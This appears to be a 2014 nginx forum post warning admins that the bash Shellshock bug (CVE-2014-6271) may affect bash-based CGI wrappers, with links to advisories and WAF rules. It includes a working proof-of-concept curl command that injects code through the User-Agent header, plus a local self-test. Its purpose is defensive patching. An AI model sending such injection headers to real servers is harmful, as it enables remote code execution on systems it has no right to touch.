Welcome! Log In Create A New Profile

Advanced

CVE-2014-6271 : Remote code execution through bash

mex
September 24, 2014 07:53PM
hi list,

the following bug (Remote code execution through bash)
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

**might** affect you if you use a shell/bash - based fcgi-wrapper like in the following
receipt: http://wiki.nginx.org/Fcgiwrap / http://wiki.nginx.org/FcgiwrapDebianInitScript
(did not tested it); if someone runs a shell-based cgi-wrapper and would like to test the POC from
reddit, i'd be interested in the result :D

curl -v -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' http://example.com/path/to/file


at least i can confirm this affects bash-based CGIs.
ssh-based gitolite/gitlab et al are affected too.


local self-test:

# Output, wenn vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test


# Output, wenn not vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test



additional references:

Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml)
http://seclists.org/oss-sec/2014/q3/649

Analysis 1 oss-sec ml
http://seclists.org/oss-sec/2014/q3/650

Analysis 2 / RedHat
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Naxsi-WAF Signatures
http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html



regards & happy patching
(and sorry for this slightly OT-post)


mex
Subject Author Posted

CVE-2014-6271 : Remote code execution through bash

mex September 24, 2014 07:53PM

Re: CVE-2014-6271 : Remote code execution through bash

Andrew Cantino September 25, 2014 12:52AM

Re: CVE-2014-6271 : Remote code execution through bash

mex September 25, 2014 03:27AM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 93
Record Number of Users: 6 on February 13, 2018
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready